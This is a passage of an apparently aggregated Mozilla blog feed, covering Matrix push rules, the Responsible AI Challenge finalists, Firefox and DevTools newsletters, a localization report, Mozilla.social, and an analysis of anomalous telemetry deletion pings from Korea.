The unread (“bold”) rooms logic in Element Web is completely custom and outside of the Matrix specification.

Note that if you enable hidden events (or tweak other options to show events) then the behavior changes!

Putting it all together…

…it gets complicated trying to figure out whether a message will generate a notification or not.

Flow chart of the default Matrix push rules when using Element.

The default Matrix push rules (also showing the options available within Element).

[1]Improving unintentional mentions (MSC3952) is the main feature we were working on, but this was powered by MSC3758 (from Beeper), MSC3873 (from a coworker), and MSC3966. MSC3980 was also a follow-up for consistency.
[2]

Notification count (the grey badge with count in Element Web) is the number of unread messages in a room. Highlight count (the red badge with count in Element Web) is the number of unread mentions in a room.

Warning

The unread (“bold”) rooms feature in Element Web, which represents a room with unread messages (but no notification count) is not powered by push rules (and is not specced).

See the Element Web docs on the room list.

[3]This post generally defines “push notifications” as a notification which is sent via a push provider to an application. Push providers include Apple, Google, Microsoft, or Mozilla.
[4]MSC4010 aims to make this explicit.
[5]See MSC3987.
[6]It was not clear how clients should handle encrypted events until recently.
[7]Adapted from a Gist from Half-Shot.
[8]These don’t seem to be specced, I’m unsure if other clients create similar rules or understand these rules.

The Mozilla BlogMeet the ‘Responsible AI Challenge’ top 10 finalists

Last March, during the SXSW festival in Austin, Texas, Mozilla issued a call to builders and technologists all over the world to create trustworthy AI solutions when we relaunched the Mozilla Builders program and unveiled our Responsible AI Challenge — a one-day, in-person event designed to inspire and encourage a community of builders working on trustworthy AI products and solutions. 

The future of AI is promising! And there are those, like Mozilla, who believe in its power and potential to solve the world’s most difficult challenges. Nonetheless, we also recognize its risks and advocate for and contribute to the responsible development of AI for the betterment of society. Ultimately, we believe that responsible AI – technology that takes into consideration accountability, user agency, and individual and collective well-being – is demonstrably worthy of trust.

Challenge accepted! Announcing our top 10 finalists

After weeks of reviewing hundreds of competitive consumer technology and generative AI projects, it is with great pleasure that we announce our top 10 challenge finalists. The finalist selection process was made possible by a panel of select individuals including AI academics, developers and entrepreneurs. We’re deeply grateful to the panel for sharing their time, insight and expertise, and Mozilla is honored to share resources with and work alongside the final challengers and their projects listed below:

Micro Adventures is an AI-powered app that offers gamified local learning adventures for parents and kids.

Droomverhalen (Dutch for ‘dream stories’) is an AI-based story generator that enables parents to craft unique and personalized stories for their little ones.

LivePose Portal trains participants and deep-learning models for camera-based group interactivity in the immersive arts.

Nolano is a trained language model that uses natural language processing to run on laptops and smartphones.

Kwanele Chat Bot aims to empower women in communities plagued by violence by enabling them to access help fast and ensure the collection of admissible evidence.

Simprints is developing privacy-preserving, unbiased face biometrics with AI for NGOs and governments in global health and humanitarian programs.

Quirk is building game-based virtual worlds where children learn character building skills with the help of AI guidance and through play.

Visually Impaired Assistant System is a multi-disciplinary AI project that aims to improve accessibility for the visually impaired community.

Blind AI provides a confidential deployment solution for LLMs, in order to enable the protection of sensitive data when leveraging AI SaaS solutions.

Sanative AI provides anti-AI watermarks to protect images and artwork from being used as training data for diffusion models.

What’s in San Francisco? A golden state of mind.

Esteemed builders and technologists will join each other in San Francisco on May 31 for a day of discovery and celebration as we showcase some of the most innovative and responsible uses of AI to date, learn from industry thought leaders, and discover the future of AI together.

In addition to cash prizes, the top three Responsible AI Challenge winners will receive ongoing access to mentorship from leaders in the industry as they continue to develop, refine and deliver their responsible AI projects.

“Mozilla is in great company working beside other organizations and individuals committed to responsible innovation and ensuring the future of AI is one that provides ethical solutions that benefit humanity. We’re already blown away by the caliber of applications we’ve gotten and are grateful for the community support we’ve received from folks like Craig Newmark Philanthropies and others who have stepped forward to make this challenge a reality.”

Imo Udom, Senior Vice President of Innovation Ecosystems at Mozilla

Meet our judges and speakers

The event will feature keynotes from Margaret Mitchell, chief AI ethics scientist at Hugging Face who was also recently named one of Time’s Top 100 Most Influential People, and Gary Marcus, Emeritus Professor of Psychology and Neural Science at NYU and bestselling author. We’ll also introduce a special guest! 

Finalists will have the opportunity to pitch in front of a panel of judges with combined expertise in technology, entrepreneurship and ethics.

Margaret Mitchell, Speaker

Margaret is the Chief Ethics Scientist at Hugging Face, with deep experience in ML development, ML data governance, and AI evaluation.

Gary Marcus, Speaker

Gary is the Emeritus Professor of Psychology and Neural Science at NYU and the author of five books, including New York Times Bestseller Guitar Zero.

Raffi Krikorian, Judge

Raffi is an Armenian-American technology executive and the CTO of the Emerson Collective.

Lauren Wagner, Judge

Lauren is an early-stage investor and Fellow at the Berggruen Institute.

Ramak Molavi, Judge

Ramak is a digital rights lawyer and has led the “Meaningful AI Transparency” research project at Mozilla since 2021.

Raesetje Sefala, Judge

Raesetje is an AI Research Fellow at the Distributed AI Research Institute (DAIR).

Damon Horowitz, Judge

Damon is a technologist, philosophy professor and serial entrepreneur.

James Hodson, Judge

James is the CEO of the AI for Good Foundation, which is building economic and community resilience through technology.

Deb Raji, Judge

Deb is a Nigerian-Canadian computer scientist and activist working on algorithmic bias, AI accountability, and algorithmic auditing.

Visit the Responsible AI Challenge website for the full and announced list of finalists, judges, speakers and partners. 

The post Meet the ‘Responsible AI Challenge’ top 10 finalists appeared first on The Mozilla Blog.

Mozilla ThunderbirdThunderCast Episode #2: With Special Mozilla Guest Mike Conley

The Thunderbird logo, a headshot of Mike Conley, and the text "ThunderCast #2: Mozilla's Mike Conley & The Retro Internet Retreat"

Welcome back to the ThunderCast, the official podcast of Mozilla Thunderbird! In this episode, we’re thrilled to welcome our first special guest: Mike Conley, Principal Software developer at Mozilla. Mike is a software mechanic, musician, livestreamer, and self-described “pre-internet phenomenon” among many other awesome things.

We had a wonderful, energetic conversation about the early days of the internet, Mike’s early work on Mozilla Messaging, and his current work on Firefox. He also gives us a peek behind the curtain of upcoming Picture-in-Picture features, and some fresh changes to Firefox’s migration tools.

We also asked Mike about some of the more underrated features of Firefox. Plus, we get the community involved by asking you which Thunderbird features more people should know about.

Hope you enjoy listening to this one as much as we enjoyed recording it!

Where To Get The Podcast

Links Mentioned

1) uBlock Add-on for Thunderbird:

2) The Joy of Coding:

3) Neocities, making the internet fun again

4) Follow us on the Fediverse: 

Transcript

We include a full transcript of the episode inside the podcast metadata, which should be supported by your podcast app. If it’s not, here’s a direct link to the Episode 2 transcript.

The post ThunderCast Episode #2: With Special Mozilla Guest Mike Conley appeared first on The Thunderbird Blog.

Tiger OakesDisplay math formulas without any CSS or JS

MathML lets you insert math formulas with just HTML.

Firefox NightlyShort but Sweet – These Weeks in Firefox: Issue 137

Highlights

  • aminomancer and Negin from the OMC team are making it possible to embed the new migration wizard nicely in about:welcome! This metabug tracks that effort.
  • bnasar added support for a new keyboard shortcut to toggle PiP fullscreen mode
    • You can now press the “f” key or double click the PiP window to toggle fullscreen mode
  • At long last, after much experimentation, the about:home startup cache is being (cautiously) rolled out to users on the release channel! The about:home startup cache improves the loading time of about:home on browser start. If all goes well, we expect (almost) all users to have the cache enabled by default in Firefox 113. We may continue to do a few holdback studies just to double-check the performance of the cache in the wild.

Friends of the Firefox team

Resolved bugs (excluding employees)

Volunteers that fixed more than one bug

  • Itiel
  • Mathew Hodson
  • portiawuu
  • Victoria Ajala

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

WebExtensions Framework
WebExtension APIs

Developer Tools

DevTools
WebDriver BiDi
  • Sasha added support for “channels” to our script.callFunction and script.addPreloadScript commands. This allows clients to create custom events (e.g. DOM mutations) (bug).
  • Sasha also updated our serialization to match the latest spec updates. This gives better control for objects and DOM nodes serialization (bug).
  • Thanks to Jamie for also fixing Marionette’s getComputedRole to return ARIA roles (bug).

ESMification status

  • Progress has levelled off a little, but some bigger patches are in the pipeline.
  • Converting modules used in workers is waiting on ES module workers to ship (probably shipping in 114).
  • ESMified status:
    • browser: 63%
    • toolkit: 78%
    • Total: 75.5% (up from 74.6%)
  • #esmification on Matrix
  • Migration Document (with a walkthrough!)

Lint, Docs and Workflow

Migration Improvements (CalState LA Project)

Picture-in-Picture

Search and Navigation

Storybook/Reusable Components

Mozilla Localization (L10N)L10n Report: May 2023 Edition

Please note some of the information provided in this report may be subject to change as we are sometimes sharing information about projects that are still in early stages and are not final yet. 

Welcome!

New localizers

Are you a locale leader and want us to include new members in our upcoming reports? Contact us!

We also want to welcome Ayanaa Rahman to the localization team. She’s joining us for an internship as a backend software engineer, and you’ll see her active primarily around Pontoon. Here’s a few words from her:

Hi all, I’m Ayanaa Rahman. I recently completed my third year studying Computer Science at the University of Toronto. I have also worked at financial institutions in both the US & Canada as a Software Developer intern, focusing on automation and big data.

Born into an immigrant family and raised in the multicultural city of Toronto, I’ve been exposed to multiple languages and cultures throughout my life. This experience has highlighted the importance of effective communication across different languages, particularly to enhance people’s digital experiences. I am eager to leverage my background and skills to make a meaningful contribution to the Mozilla community.

New content and projects

What’s new or coming up in Firefox desktop

Firefox 113, shipping to release users on May 9, is going to include a new locale: Tajik (tg). Huge thanks to Victor Ibragimov, the locale manager, and all other community members for achieving such an impressive result. Victor has been amazing over the last months, both online and offline, in finding resources and promoting the Tajik language.

In terms of new features, developers are currently working on the workflow to import data from other browsers, and we expect an overall increase in the number of strings around messaging and onboarding. Keep an eye out on notifications in Pontoon for updated testing instructions.

Fonts and fingerprinting

Firefox developers are working on reducing the ability for websites to track users based on their browser “fingerprint”, and fonts are one of the characteristics that bad actors can use to uniquely identify your browser.

By restricting access to only fonts pre-installed with the operating system, this form of fingerprinting becomes much less effective. The challenge is that it could impair the experience for users that access content in other languages, as they might rely on fonts installed through other systems (e.g. OS language packs).

Given how large the number of possible scenarios is, the team working on this feature needs help from the localization community to ensure user experience is not degraded. This document contains detailed information about the feature, how to test it and how to report errors.

What’s new or coming up in mobile

Things have been moving quite a bit in mobile land since our last report in January – especially with the past couple of versions leading up to the next v114 (in Nightly right now) – which all feature some notable updates.

A reminder that the last day to get translations in for version 114 is May 28 (all strings for this version should have landed by approximately May 5).

One thing you may have noticed is the experiments going on these days in both Firefox desktop and mobile (often labeled as “Nimbus” in localization comments and string IDs). For mobile, we have been experimenting with onboarding cards that suggest new users set Firefox as their default mobile browser.

Other notable updates are:

  • Users can now choose whether to be asked every time they open a link that would open in another app
  • Websites that use window.print() can now be printed in Firefox for Android
  • Improvements to Credit Card Autofill
  • Cookie Banner Reduction/Blocking: this new feature aims to provide users a seamless browsing experience by drastically minimizing cookie banner annoyance, while also delivering the most private and secure way to handle cookie banners

Now on to some community highlights: on mobile, Tajik (tg) has recently shipped a 100% complete translation of the Focus for Android browser, making it the third browser available to Tajik speakers: Firefox for desktop, Firefox for Android, and now Focus for Android. As mentioned previously in this newsletter, congratulations to Victor and his team for sustaining this work – and the community – across the board! We look forward to the local initiatives taking place in Tajikistan in the near future, expanding the open, free and accessible internet in the region.

Amharic (am) has also recently shipped entirely localized versions of Firefox for Android, Focus for Android and Focus for iOS. Congratulations to the team who has worked relentlessly on keeping these projects up to date as well as growing the community.

Sardinian (sc) also recently initiated and completed Firefox for Android localization, as an ongoing effort alongside their existing projects. And the Persian (fa) locale has been ramping up with projects thanks to locale manager Reza and fellow translator MSKF.

We want to take the opportunity to remind folks that Firefox for Android has an in-app language switcher, which works independently from the native Android OS language options. It generally supports a larger set of languages than the Android system language settings does. Head over to your Firefox for Android “Settings > Language” to discover 100+ languages available. (Taking the opportunity to note that a language switcher also exists within the Mozilla VPN settings, which seems to be a feature overlooked by many).

What’s new or coming up in web projects

Relay Website

As you may have noticed, the app.ftl file is no longer in Pontoon. In its place are multiple feature-oriented files. The goal is to make each file more modular, giving more context about where strings land in the product; it also offers the flexibility to provide region-specific strings. There will be a few more of these efforts in the future. Strings localized prior to the migration have already been moved to the new files, including their contribution history, so there is no need to retranslate them. Any untranslated strings you see are brand new.

Mozilla.org

This is a heads-up. A few pages from the Relay Website project will be migrated to mozilla.org. Pages to be migrated include faq.ftl and landing.ftl. Like the previous migrations, the Pontoon team will do their best to preserve the work you did, including the attributes attached to each localized string, whether approved or pending review. For locales that have not localized the Relay product, you will see an increase in untranslated strings. You can prioritize these sets of files against others.

The migration is scheduled to be complete before the next l10n report. The purpose of this migration is for better search ranking. A link to the Relay pages will be added to the navigation bar.

Firefox Accounts

The Firefox Accounts team is undertaking work to improve the user experience around account authentication and data recovery. Some changes are already in progress, and going forward you should see more strings related to two-factor authentication, account recovery, password resets, and more. Many of these changes can be previewed before they reach staging or production by checking Storybook, which can show English strings in context. The link to Storybook can be found under the resources section of Firefox Accounts within Pontoon.

What’s new or coming up in SUMO

  • Check out the SUMO Sprint wikipage for Firefox 113 to learn more about how you can help with this release.
  • Watch the recording of our community call in March if you haven’t already to learn more about the SUI (Simplified User Interface) screenshots that Lucas shared.
  • It’s also highly recommended to watch our community call in April to catch up on the results of the contributor survey we ran in Q1.
  • If you’re a Social Support or Mobile Store Support contributor, make sure to watch the contributor forum for weekly updates about queue stats; Kiki will post them by the end of each week. Here’s the latest one from last week.
  • You can now learn more about Kitsune releases by following this Discourse topic.

What’s new or coming up in Pontoon

Pretranslation

We have successfully completed the Alpha testing phase of the Pretranslation feature with the Italian and Slovenian locales. The results, especially when accounting for the bugs fixed during the testing period, were quite promising:

  • 51.62% of pretranslated strings were approved without changes.
  • 96.16% were manually reviewed as “usable”.
  • The average chrF++ score was 93.01.
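For readers unfamiliar with the metric: chrF scores measure the overlap between machine output and a human reference using character n-grams (chrF++ additionally mixes in word 1- and 2-grams). Here is a minimal pure-Python sketch of the character-level part, for illustration only — real evaluations use an implementation such as sacrebleu, which also handles tokenization details omitted here:

```python
from collections import Counter

def char_ngrams(text, n):
    text = text.replace(" ", "")          # chrF ignores whitespace
    return Counter(text[i:i + n] for i in range(len(text) - n + 1))

def chrf(hypothesis, reference, max_n=6, beta=2.0):
    """Average F-beta over character 1..max_n-grams, with recall weighted
    twice as heavily as precision (beta=2), as in the standard chrF setup."""
    scores = []
    for n in range(1, max_n + 1):
        hyp, ref = char_ngrams(hypothesis, n), char_ngrams(reference, n)
        if not hyp or not ref:
            continue
        overlap = sum((hyp & ref).values())
        precision = overlap / sum(hyp.values())
        recall = overlap / sum(ref.values())
        if precision + recall == 0:
            scores.append(0.0)
        else:
            scores.append((1 + beta**2) * precision * recall
                          / (beta**2 * precision + recall))
    return 100 * sum(scores) / len(scores) if scores else 0.0
```

An average score around 93 therefore means the pretranslated strings were, at the character level, very close to what reviewers ultimately approved.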

Between April and June 2023, the Pontoon Pretranslation feature will be in the Beta testing phase with a total of 9 participating locales. If successful, we expect to make the feature available to more locales soon after. Stay tuned!

New contributions

Thanks to our army of awesome contributors for recent improvements to our codebase:

  • Willian, who joined the project last year, landed 10 additional patches(!) recently, including making the All contributions view the new default view on the Profile page.
  • Ivan added support for reading project configurations from the repository. (Ivan, sorry it took forever to review it!)
  • Uriel added support for implicit TLS emails.

Newly published localizer facing documentation

We have neglected our Pontoon documentation for a long time, and unfortunately it shows. We’re actively working on updating it, and we plan to wrap this project by the end of June.

Events

Localization “Fireside Chat”: come join us on Wednesday, May 10, at 9am PT, where we will answer any questions you may have concerning updates contained in this localization report. This is the first time the localization-drivers are trying out this type of event, and we will accommodate more time zones in the next iteration. It will take place on AirMozilla, and is open to anyone interested.

In the meantime you can check out our blog and visit past reports here.

Stay tuned on Discourse or in our Matrix channel for more info coming out soon!

Start asking questions here (or in this pad). You can also drop questions in the comments section of this blog post. Note that during the event, you will be able to ask more questions on our Matrix channel, and we will address them live if time permits.

Want to showcase an event coming up that your community is participating in? Contact us and we’ll include it.

Friends of the Lion

Image by Elio Qoshi

  • Thanks to all locale managers and translators who are helping us to test the Pretranslation feature in Pontoon. The locales currently involved are: cy, de, es-AR, fr, hu, id, it, sl, zh-TW. Your help, on top of what you’re doing every day to support Mozilla, is very much appreciated.
  • Kudos to Aderajew and Bantegize, who together revived the Amharic community in the span of a few months! They completed the localization of a few mobile projects, and are making progress weekly on the mozilla.org project. Between the two of them, they split the tasks according to what each does best: localizing the products, looking for new contributors, and building up the community. Way to go!
  • Parvez and Abass led the effort in completing several high priority projects for Saraiki, including Firefox desktop, mobile products for Android, and mozilla.org.

Know someone in your l10n community who’s been doing a great job and should appear here? Contact us and we’ll make sure they get a shout-out!

Useful Links

Questions? Want to get involved?

If you want to get involved, or have any questions about l10n, reach out to:


Did you enjoy reading this report? Let us know how we can improve it.

The Mozilla Blog: The internet deserves a better answer to social

The internet isn’t just about browsers. Browsers are a critical part of the human experience on the internet and will always be core to our work at Mozilla. But the internet is bigger than browsers — it’s every piece of content, app and experience on your device. Our mission will always be to make the internet better for everyone, and because of that, just like with browsers over the last quarter century, we need to show a better way forward in problematic areas over the next 25 years. And today, I’m thrilled to share a new area of experimentation for us — social. 

Love it or hate it, there’s no denying that social media is a huge part of our lives. At its best, it’s how we connect with one another across space and time, discover new ideas, learn what’s happening in the world, and get introduced to content that makes us feel. It provides critical services, like alerting us to catastrophic weather or that the train you’re waiting for is delayed. It’s helped chip away at traditional power dynamics, giving a public platform to voices that haven’t had one before and offering a way for us to have influence over the powers and decision-makers that shape our lives.

But, look, at the risk of being both dramatic and cliched, social is broken. Most of those great things I just mentioned are…well none of them are working super well right now, are they? Things are primed for experimentation and a new direction, and we believe the Fediverse is central to that. Why? Because it moves power away from big tech companies and into the hands of diverse voices to build a social platform that meets people’s needs, not shareholders’ needs.

Last year, we announced we’re dipping our toes into the world of Mastodon. Today, we’re expanding Mozilla.social to a private beta. We’ve put a lot of work into getting to this stage, but there is a lot more to do before we open it up more broadly. We’re making a long-term investment because we think we can contribute to making Mastodon, and social media generally, better.

You’ll notice a big difference in our content moderation approach compared to other major social media platforms. We’re not building another self-declared “neutral” platform. We believe that far too often, “neutrality” is used as an excuse to allow behaviors and content that’s designed to harass and harm those from communities that have always faced harassment and violence. Our content moderation plan is rooted in the goals and values expressed in our Mozilla Manifesto — human dignity, inclusion, security, individual expression and collaboration. We understand that individual expression is often seen, particularly in the US, as an absolute right to free speech at any cost. Even if that cost is harm to others. We do not subscribe to this view. We want to be clear about this. We’re building an awesome sandbox for us all to play in, but it comes with rules governing how we engage with one another. You’re completely free to go elsewhere if you don’t like them. 

I’d love to say those rules will be perfect on day one, but they won’t and we know they never will be. But we’re going to create a way to have a dialogue with the community we want to form, and to be open about what we’re learning. 

What’s most important to us is that the people who use our instance feel like their experience brings back more of what makes social great – and reduces the muck that has made it horrible. 

This will take us a while, especially because we’re committed to doing it in the open and with the community that already exists. Many other areas of the experience are ripe for experimentation – onboarding, discovery, identity, monetization just to name a few – so expect more from us soon. 

If you’re interested in joining mozilla.social as we continue to expand it, join our waitlist. Or get involved in your own way–join in, give feedback, create your own instance. We could not be more excited about this, and can’t wait to work with all of you to build something that’s better for all of humanity. 

The post The internet deserves a better answer to social appeared first on The Mozilla Blog.

William Durand: Moziversary #5

Today is my fifth[1] Moziversary 🎂 I joined Mozilla as a full-time employee on May 1st, 2018. I previously blogged in 2019, 2020, 2021, and 2022.

I spent a good chunk of last year working on Manifest Version 3 (MV3) with the rest of my team (WebExtensions / Add-ons team). My most notable “H1 2022” contributions were probably the scripting namespace and a simpler versioning format.

The extensions button and its panel (with 3 extensions listed) in Firefox.

Next, I worked on a new primary User Interface (UI) for Firefox Desktop: the extensions button. This feature wasn’t unanimously well-received[2][3] (like many other changes to the Firefox UI). Anyway, I addressed different (usability) issues since then, and I will continue to do so!

I also…

But wait, there is more!

When I was on the AMO team, we had to maintain a feature named “Return to AMO” (RTAMO). In short, this feature allows new users interested in an add-on on addons.mozilla.org (AMO) to download Firefox and install the add-on when Firefox starts for the first time (without having to go back to AMO). RTAMO was extended to more add-ons at the beginning of 2022 (and I was involved). I became very knowledgeable about how attribution worked and documented all of that.

This is one of the reasons why I became the main owner[4] of the stub attribution service, an HTTP server that encodes attribution data in Firefox (for Windows) installers and – incidentally – one of the few critical services involved when users download Firefox. Coincidentally, this project is now at the center of different 2023 projects. Good thing I took the time to put this project back on track 😛

Phew. That was a good year! I am now involved in many cross-functional projects and I really enjoy it. Speaking of which, I am currently working on bringing more add-ons to Firefox for Android 🚀

That’s all for now. Many thanks to everyone I worked with over the last 12 months, it’s been great working with all of you!

  1. 5 years or… 5 months? I moved back to France and my current employment contract started on January 1st, heh. Still better than nothing, though. 

  2. In case you didn’t know, many engineers read Reddit and/or other social platforms. I’ve shared actionable feedback from public comments internally more than once. That said, writing that the extensions button is the “worst Mozilla idea of the decade” isn’t helpful. 

  3. If I may, I would add that reaching out to me personally to say that you hate the button is probably not OK. 

  4. I am (still) trying to build a small team around this project and another one. If you want to join the fun, please let me know! 

Data@Mozilla: Never Look at the Data: Why did we start getting so many pings from Korea?

Something happened on January 5, 2023. All of a sudden we abruptly started receiving a number of pings from Firefox Desktop clients in Korea equal to two times the size of the entire Korean Firefox Desktop population.

What happened? How did we notice it? What did we do about it?

Let’s back up.

I can’t remember where I learned it, but I’d already started reciting as dogma in my first year of University: “The most important part about any feature is the ability to turn it off”. It’s served me well through my studies and my career. I’ve also found it to be especially true for data collection systems where, for whatever reason, as a user you might decide you no longer want the software you’re using to continue to send data. In some places this is even enshrined in laws where you can request the deletion of data that has already been collected.

Law or not, Mozilla has before, does now, and will always make it easy for you to decide whether to send data to Mozilla. We may not understand why you make that choice, and it definitely will make it harder for us to ensure our products meet your needs, but we’ll respect the heck out of your choice in our processes and in our products.

This is why, when Mozilla’s data collection system Glean is told the user went from allowing data upload to forbidding it, we send one final “deletion-request” ping before shutting down. The “deletion-request” ping contains all the internal identifiers we’ve used to longitudinally group data (if we receive ten crash reports it’s important to know whether it’s the same Firefox crashing ten times or if it’s ten Firefoxes crashing once), and we use those identifiers to (well) identify what data we’ve collected that we’re now going to delete.

For the purposes of this story you’ll need to know that there are two times when Glean notices the product’s gone from “data upload: on” to “data upload: off”: while Glean is running, and during Glean startup. If Glean’s running, then we just handle things – we were told the setting changed from “data upload: on” to “data upload: off” and away we go. But Glean knows that it isn’t always listening to the data upload setting, so if it starts up with “data upload: off” and the last time it shut down we were at “data upload: on”, we’ll send a specific “at_init”-reason “deletion-request” ping.
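A hypothetical sketch of that startup check (this is not Glean’s actual API, just the logic described above): compare the persisted upload setting with the one the product starts with, and send the “at_init”-reason ping when uploads were switched off in between.

```python
import json
import pathlib

# Hypothetical state file standing in for Glean's persisted settings.
STATE = pathlib.Path("glean_state.json")

def glean_init(upload_enabled, send_ping):
    """On startup, compare the persisted upload setting with the current one."""
    previous = json.loads(STATE.read_text()) if STATE.exists() else None
    if previous is not None and previous["upload_enabled"] and not upload_enabled:
        # Uploads were turned off while Glean wasn't running (or very early
        # in startup): send the final ping with the "at_init" reason.
        send_ping({"type": "deletion-request", "reason": "at_init"})
    STATE.write_text(json.dumps({"upload_enabled": upload_enabled}))
```

Note that automation rewriting the state file between runs would trigger exactly this path, which is why the “at_init” reason figures in the single-actor hypothesis below.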

We in the Data Org monitor how Glean is behaving. One thing we’ve learned about how Glean behaves is that the number of “deletion-request” pings is roughly constant over time. And the proportion of “deletion-request” pings that have the “at_init” reason should remain fairly fixed.
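An illustrative monitor for that invariant (not our actual alerting stack — the reason names other than “at_init” are made up here) only needs to compare each day’s “at_init” share against the historical baseline:

```python
def at_init_share(counts):
    """Fraction of the day's "deletion-request" pings with the "at_init" reason."""
    total = sum(counts.values())
    return counts.get("at_init", 0) / total if total else 0.0

def anomalous_days(daily_counts, baseline, tolerance=0.10):
    """Days whose "at_init" share drifts from the baseline by more than tolerance."""
    return [day for day, counts in daily_counts.items()
            if abs(at_init_share(counts) - baseline) > tolerance]
```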

What shouldn’t happen is for Firefox Desktop-sent “at_init”-reason “deletion-request” pings to spike like this on January 5:


time-series plot of ping volumes from December 2022 until mid-January 2023 showing abnormal abrupt increases in volume starting on January 5.


What we do when we notice things like this is file a bug. As the one responsible for Glean’s integration in Firefox Desktop, and as someone with a long history of looking into anomalies, I took a look. At this initial point I was pretty sure it’d be a single actor (a single user, a single company, a single internet cafe) doing something odd… but alas, the evidence was inconclusive:

Evidence consistent with a single actor being responsible for it all:

  • All the pings were coming from the same internet provider. Korea Telecom is responsible for a bare majority of Firefox Desktop data delivery from Korea, but the spikes were entirely from that ISP.
  • The Mozilla Community in Korea could offer no explanation of any wide-spread computer or software event that matched the timeline.
  • “at_init”-reason “deletion-request” pings could be a result of automation changing the files on disk to read “data upload: off” between runs of Firefox Desktop.

Evidence inconsistent with a single actor being responsible for it all:

  • The data came from a mix of Firefox Desktop versions: versions 101.0.1, 104.0, and 108.0.2.
  • The data came from a range of different regions, more or less following the population density of Korea itself.
  • “at_init”-reason “deletion-request” pings could instead be the result of users changing the setting to “data upload: off” early enough during Firefox Desktop startup that Glean hasn’t yet been initialized.

Regardless of why it was happening, it quickly became more important that we learn what we needed to do about it. We spun up an Incident, which is how we organize ourselves when there’s something happening that requires cross-functional collaboration and isn’t getting better on its own. Once there we ascertained that we could respond very quickly and decisively and do

Nothing at all.

The volume of these pings vastly eclipsed any other “deletion-request” pings we would otherwise have received, so you’d be forgiven for thinking that it was terribly expensive to receive, store, and process them all. In reality, we batch these requests. And even before this spike, every batch of requests required editing every partition of every table. Adding another list of identifiers to delete equal in size to two times the peak Firefox Desktop population in Korea just doesn’t matter all that much.
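A toy model of why batch size barely matters (hypothetical code, not the real pipeline): each batch rewrites every partition exactly once, regardless of how many identifiers it carries.

```python
def apply_deletion_batch(partitions, ids_to_delete):
    """Drop all rows belonging to the deleted client ids.

    Each partition is rewritten exactly once per batch, so the cost is
    driven by the number of partitions, not by how many ids the batch holds.
    """
    ids = set(ids_to_delete)               # O(1) membership checks
    rewrites = 0
    for name, rows in partitions.items():
        partitions[name] = [r for r in rows if r["client_id"] not in ids]
        rewrites += 1                      # one rewrite per partition
    return rewrites
```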

The pressure was off. Even if it got worse… which it did:

Time-series plot of "deletion-request" pings isolated to just those from Korea. Spikes begin January 25 and dwarf other reports. A plateau begins March 26 and continues to the right edge of the plot around April 10.


On March 26, when it reached and maintained a peak of five times the volume of the Firefox Desktop population in Korea, it still wasn’t harming our data platform’s ability to serve business needs or costing us all that much in operational spend. We didn’t need to invest effort into running down the source, so we didn’t.

And so I just kept an occasional eye on it until, just as suddenly but not quite as abruptly as it began, on April 12 the ping volumes began to decrease. By April 18, we were back to normal levels.

Time-series plot of "deletion-request" pings isolated to just those from Korea. Very similar to the previous plot, but continues until April 18. Spikes begin January 25 and dwarf other reports. A plateau begins March 26 and stays up there until April 12 when falls away to nothing over the course of five days or so.


We had successfully ignored it until it went away.

So what happened to Korean Firefox Desktop users from Jan 5 to April 12, 2023? We never figured it out. If you know about something happening across those dates in Korea: please get in touch. As little as it needed solving for the sake of business needs, it still needs solving for the sake of my curiosity.

:chutten

(( This is a syndicated copy of the original post. ))


Firefox Developer Experience: Firefox DevTools Newsletter — 112-113

Developer Tools help developers write and debug websites in Firefox. This newsletter gives an overview of the work we’ve done as part of the Firefox 112 and 113 Nightly release cycles.

Firefox 112

Firefox being an open source project, we are grateful to get contributions from people outside of Mozilla.

  • Christian Sonne landed a patch to display subgrid in the auto-complete suggestions for grid-template-* and grid properties in the Rules View (bug)
    screenshot of the inspector rule view where a `grid-template-columns` is being added, and the value input has an autocomplete list that includes a `subgrid` item (amongst other)
  • There are several ways to take screenshots from DevTools and thanks to Connor Pearson, they are now placed in the images folder on OSX (bug)

DevTools are written in HTML, CSS and JS, so any web developer can contribute! Read how to set up the work environment and check the list of mentored issues.


linear() is a new animation timing function that landed in 112 (MDN), and Nicolas added a widget to modify its arguments (bug):

  • double clicking on a point will remove it
  • double clicking anywhere else will add one
  • points can be moved with drag and drop
  • holding Shift will snap the point to the grid
In the Rules view, an `animation-timing-function` property has the value `linear(0, 0.8, 0.2, 1)`. Clicking the button displayed before the value opens a modal with a chart onto which the values of the linear function are plotted and connected with straight lines. The new linear widget makes it easier to tweak animation timing functions.
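To make the widget’s semantics concrete, here is a simplified Python model of how linear() maps progress to output values, assuming evenly spaced stops (the real CSS function also accepts explicit input percentages, which this sketch ignores):

```python
def linear_easing(stops):
    """Simplified model of CSS linear(): the output values in `stops` are
    spread evenly over the input progress range [0, 1], and intermediate
    progress values are interpolated linearly between neighboring stops."""
    xs = [i / (len(stops) - 1) for i in range(len(stops))]

    def ease(t):
        if t <= 0:
            return stops[0]
        if t >= 1:
            return stops[-1]
        for i in range(len(stops) - 1):
            if xs[i] <= t <= xs[i + 1]:
                fraction = (t - xs[i]) / (xs[i + 1] - xs[i])
                return stops[i] + fraction * (stops[i + 1] - stops[i])

    return ease

# The value shown in the screenshot: linear(0, 0.8, 0.2, 1)
ease = linear_easing([0, 0.8, 0.2, 1])
```

Dragging a point in the widget corresponds to changing one entry of `stops`; adding or removing a point changes how the input range is subdivided.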

Brad improved the performance of the grid highlighter (bug), and Alex made some interactions in the debugger more than 10% faster.

We also fixed a few bugs in the tools:

  • Emilio fixed an issue that would leave the page in a weird state when closing Responsive Design Mode (bug)
  • The “Disable JavaScript” feature was fixed by Julian (bug)
  • Julian fixed a regression that broke network throttling in the Netmonitor (bug)
  • Alex made it possible to copy text from Netmonitor HTML preview again (bug)
  • Hubert also fixed an issue with Navigator.sendBeacon requests that were shown as Blocked in the Netmonitor even if they went through (bug)

Firefox 113

We got awesome help from external contributors:

  • Masashi Hirano added support for BigInt in console API methods (bug)
  • zacnomore improved the display of our pseudo class panel (bug)

Since the beginning of the year, we have been working on features that would help the Web Compatibility team, and hopefully those should benefit all web developers who need to debug websites in production.

The main feature we added is the ability to override a script from the debugger (bug).

In the Sources tree, an “Add script override” context menu entry was added. It will download the file to your machine so it can be edited; after reloading, the local file is the script that will be used in the page (a purple icon indicates when a file is overridden)

The debugger source tree is displayed, with a Javascript file, App.js, being focused. The context menu is displayed for this file, and has a "Add script override" entry which is selected

Hubert also landed a lot of improvements for the Debugger “Search in files” feature (aka “Project search”). The panel was moved to a regular side panel, which makes it possible to keep the results list visible while opening scripts in the editor (bug)

